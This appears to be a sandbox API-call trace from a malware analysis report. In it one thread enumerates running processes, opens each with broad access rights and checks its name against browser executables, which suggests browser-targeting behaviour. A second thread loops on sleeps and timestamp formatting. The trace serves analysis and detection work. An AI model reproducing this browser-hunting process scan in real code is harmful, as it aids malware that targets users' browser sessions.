	[0256.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.827] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.827] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.827] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.828] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.828] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0256.829] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xb43c
	[0256.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.829] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0256.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.829] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.829] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0256.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.830] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.830] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.831] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xb440
	[0256.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.831] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.831] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.832] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.832] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.832] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.833] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xb444
	[0256.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.833] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.833] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.834] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.834] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.834] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.835] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xb448
	[0256.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.835] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.835] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.836] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.836] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.836] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0256.837] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xb44c
	[0256.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.837] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0256.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.837] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.838] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0256.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.838] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.838] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0256.839] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xb450
	[0256.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.846] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.847] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.847] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.847] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.848] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0256.848] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xb454
	[0256.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.849] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0256.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.849] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.849] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0256.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.849] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.849] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0256.850] CloseHandle (hObject=0x4fd0) returned 1
	[0256.850] Sleep (dwMilliseconds=0x64) 

Thread:
	id = 171
	os_tid = 0x670

	[0188.582] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x5a2d6fe0, dwHighDateTime=0x1d50a6a)) 
	[0188.582] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557847997\r\n") returned 12
	[0188.582] ResetEvent (hEvent=0xc) returned 1
	[0188.582] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0188.583] Sleep (dwMilliseconds=0xea60) 
	[0199.540] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x602a6560, dwHighDateTime=0x1d50a6a)) 
	[0199.540] Sleep (dwMilliseconds=0xea60) 
	[0210.585] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x66275ae0, dwHighDateTime=0x1d50a6a)) 
	[0210.585] Sleep (dwMilliseconds=0xea60) 
	[0221.474] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c26b1c0, dwHighDateTime=0x1d50a6a)) 
	[0221.474] Sleep (dwMilliseconds=0xea60) 
	[0221.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c2dd5e0, dwHighDateTime=0x1d50a6a)) 
	[0221.521] Sleep (dwMilliseconds=0xea60) 
	[0221.563] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c3298a0, dwHighDateTime=0x1d50a6a)) 
	[0221.563] Sleep (dwMilliseconds=0xea60) 
	[0221.568] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c34fa00, dwHighDateTime=0x1d50a6a)) 
	[0221.568] Sleep (dwMilliseconds=0xea60) 
	[0221.583] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c375b60, dwHighDateTime=0x1d50a6a)) 
	[0221.583] Sleep (dwMilliseconds=0xea60) 
	[0221.600] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c39bcc0, dwHighDateTime=0x1d50a6a)) 
	[0221.600] Sleep (dwMilliseconds=0xea60) 
	[0221.616] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c3c1e20, dwHighDateTime=0x1d50a6a)) 
	[0221.616] Sleep (dwMilliseconds=0xea60) 
	[0221.631] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c3e7f80, dwHighDateTime=0x1d50a6a)) 
	[0221.631] Sleep (dwMilliseconds=0xea60) 
	[0221.647] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c40e0e0, dwHighDateTime=0x1d50a6a)) 
	[0221.647] Sleep (dwMilliseconds=0xea60) 
	[0221.708] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c4a6660, dwHighDateTime=0x1d50a6a)) 
	[0221.708] Sleep (dwMilliseconds=0xea60) 
	[0221.755] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c518a80, dwHighDateTime=0x1d50a6a)) 
	[0221.755] Sleep (dwMilliseconds=0xea60) 
	[0221.788] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c564d40, dwHighDateTime=0x1d50a6a)) 
	[0221.788] Sleep (dwMilliseconds=0xea60) 
	[0221.818] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c5b1000, dwHighDateTime=0x1d50a6a)) 
	[0221.818] Sleep (dwMilliseconds=0xea60) 
	[0221.833] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c5d7160, dwHighDateTime=0x1d50a6a)) 
	[0221.833] Sleep (dwMilliseconds=0xea60) 
	[0221.850] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c5fd2c0, dwHighDateTime=0x1d50a6a)) 
	[0221.850] Sleep (dwMilliseconds=0xea60) 
	[0221.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c649580, dwHighDateTime=0x1d50a6a)) 
	[0221.879] Sleep (dwMilliseconds=0xea60) 
	[0221.945] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c6e1b00, dwHighDateTime=0x1d50a6a)) 
	[0221.945] Sleep (dwMilliseconds=0xea60) 
	[0221.989] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c753f20, dwHighDateTime=0x1d50a6a)) 
	[0221.989] Sleep (dwMilliseconds=0xea60) 
	[0222.026] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c7a01e0, dwHighDateTime=0x1d50a6a)) 
	[0222.026] Sleep (dwMilliseconds=0xea60) 
	[0222.036] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c7c6340, dwHighDateTime=0x1d50a6a)) 
	[0222.036] Sleep (dwMilliseconds=0xea60) 
	[0222.052] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c7ec4a0, dwHighDateTime=0x1d50a6a)) 
	[0222.052] Sleep (dwMilliseconds=0xea60) 
	[0222.067] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c812600, dwHighDateTime=0x1d50a6a)) 
	[0222.067] Sleep (dwMilliseconds=0xea60) 
	[0222.084] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c838760, dwHighDateTime=0x1d50a6a)) 
	[0222.084] Sleep (dwMilliseconds=0xea60) 
	[0222.099] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c85e8c0, dwHighDateTime=0x1d50a6a)) 
	[0222.099] Sleep (dwMilliseconds=0xea60) 
	[0222.115] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c884a20, dwHighDateTime=0x1d50a6a)) 
	[0222.115] Sleep (dwMilliseconds=0xea60) 
	[0222.176] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c91cfa0, dwHighDateTime=0x1d50a6a)) 
	[0222.176] Sleep (dwMilliseconds=0xea60) 
	[0222.223] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c98f3c0, dwHighDateTime=0x1d50a6a)) 
	[0222.223] Sleep (dwMilliseconds=0xea60) 
	[0222.251] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6c9b5520, dwHighDateTime=0x1d50a6a)) 
	[0222.251] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557849798\r\n") returned 12
	[0222.252] ResetEvent (hEvent=0xc) returned 1
	[0222.252] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0222.255] Sleep (dwMilliseconds=0xea60) 
	[0222.269] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ca017e0, dwHighDateTime=0x1d50a6a)) 
	[0222.269] Sleep (dwMilliseconds=0xea60) 
	[0222.285] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ca27940, dwHighDateTime=0x1d50a6a)) 
	[0222.285] Sleep (dwMilliseconds=0xea60) 
	[0222.301] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ca4daa0, dwHighDateTime=0x1d50a6a)) 
	[0222.301] Sleep (dwMilliseconds=0xea60) 
	[0222.317] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ca73c00, dwHighDateTime=0x1d50a6a)) 
	[0222.317] Sleep (dwMilliseconds=0xea60) 
	[0222.332] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ca99d60, dwHighDateTime=0x1d50a6a)) 
	[0222.332] Sleep (dwMilliseconds=0xea60) 
	[0222.348] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cabfec0, dwHighDateTime=0x1d50a6a)) 
	[0222.348] Sleep (dwMilliseconds=0xea60) 
	[0222.363] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cae6020, dwHighDateTime=0x1d50a6a)) 
	[0222.363] Sleep (dwMilliseconds=0xea60) 
	[0222.378] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cb0c180, dwHighDateTime=0x1d50a6a)) 
	[0222.378] Sleep (dwMilliseconds=0xea60) 
	[0222.394] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cb322e0, dwHighDateTime=0x1d50a6a)) 
	[0222.394] Sleep (dwMilliseconds=0xea60) 
	[0222.410] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cb58440, dwHighDateTime=0x1d50a6a)) 
	[0222.410] Sleep (dwMilliseconds=0xea60) 
	[0222.425] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cb7e5a0, dwHighDateTime=0x1d50a6a)) 
	[0222.425] Sleep (dwMilliseconds=0xea60) 
	[0222.451] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cba4700, dwHighDateTime=0x1d50a6a)) 
	[0222.451] Sleep (dwMilliseconds=0xea60) 
	[0222.457] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cbca860, dwHighDateTime=0x1d50a6a)) 
	[0222.457] Sleep (dwMilliseconds=0xea60) 
	[0222.472] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cbf09c0, dwHighDateTime=0x1d50a6a)) 
	[0222.472] Sleep (dwMilliseconds=0xea60) 
	[0222.488] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cc16b20, dwHighDateTime=0x1d50a6a)) 
	[0222.488] Sleep (dwMilliseconds=0xea60) 
	[0222.503] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cc3cc80, dwHighDateTime=0x1d50a6a)) 
	[0222.503] Sleep (dwMilliseconds=0xea60) 
	[0222.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cc62de0, dwHighDateTime=0x1d50a6a)) 
	[0222.519] Sleep (dwMilliseconds=0xea60) 
	[0222.535] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cc88f40, dwHighDateTime=0x1d50a6a)) 
	[0222.535] Sleep (dwMilliseconds=0xea60) 
	[0222.551] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ccaf0a0, dwHighDateTime=0x1d50a6a)) 
	[0222.551] Sleep (dwMilliseconds=0xea60) 
	[0222.566] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ccd5200, dwHighDateTime=0x1d50a6a)) 
	[0222.566] Sleep (dwMilliseconds=0xea60) 
	[0222.582] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ccfb360, dwHighDateTime=0x1d50a6a)) 
	[0222.582] Sleep (dwMilliseconds=0xea60) 
	[0222.597] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cd214c0, dwHighDateTime=0x1d50a6a)) 
	[0222.597] Sleep (dwMilliseconds=0xea60) 
	[0222.612] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cd47620, dwHighDateTime=0x1d50a6a)) 
	[0222.612] Sleep (dwMilliseconds=0xea60) 
	[0222.628] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cd6d780, dwHighDateTime=0x1d50a6a)) 
	[0222.628] Sleep (dwMilliseconds=0xea60) 
	[0222.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cd938e0, dwHighDateTime=0x1d50a6a)) 
	[0222.644] Sleep (dwMilliseconds=0xea60) 
	[0222.659] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cdb9a40, dwHighDateTime=0x1d50a6a)) 
	[0222.660] Sleep (dwMilliseconds=0xea60) 
	[0222.675] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cddfba0, dwHighDateTime=0x1d50a6a)) 
	[0222.675] Sleep (dwMilliseconds=0xea60) 
	[0222.690] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ce05d00, dwHighDateTime=0x1d50a6a)) 
	[0222.690] Sleep (dwMilliseconds=0xea60) 
	[0222.706] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ce2be60, dwHighDateTime=0x1d50a6a)) 
	[0222.706] Sleep (dwMilliseconds=0xea60) 
	[0222.722] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ce51fc0, dwHighDateTime=0x1d50a6a)) 
	[0222.722] Sleep (dwMilliseconds=0xea60) 
	[0222.739] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ce78120, dwHighDateTime=0x1d50a6a)) 
	[0222.739] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557851658\r\n") returned 12
	[0222.739] ResetEvent (hEvent=0xc) returned 1
	[0222.739] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0222.746] Sleep (dwMilliseconds=0xea60) 
	[0222.753] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ce9e280, dwHighDateTime=0x1d50a6a)) 
	[0222.753] Sleep (dwMilliseconds=0xea60) 
	[0222.769] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cec43e0, dwHighDateTime=0x1d50a6a)) 
	[0222.769] Sleep (dwMilliseconds=0xea60) 
	[0222.784] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6ceea540, dwHighDateTime=0x1d50a6a)) 
	[0222.784] Sleep (dwMilliseconds=0xea60) 
	[0222.800] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cf106a0, dwHighDateTime=0x1d50a6a)) 
	[0222.800] Sleep (dwMilliseconds=0xea60) 
	[0222.815] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cf36800, dwHighDateTime=0x1d50a6a)) 
	[0222.815] Sleep (dwMilliseconds=0xea60) 
	[0222.831] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cf5c960, dwHighDateTime=0x1d50a6a)) 
	[0222.831] Sleep (dwMilliseconds=0xea60) 
	[0222.847] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x6cf82ac0, dwHighDateTime=0x1d50a6a)) 
	[0222.847] Sleep (dwMilliseconds=0xea60) 
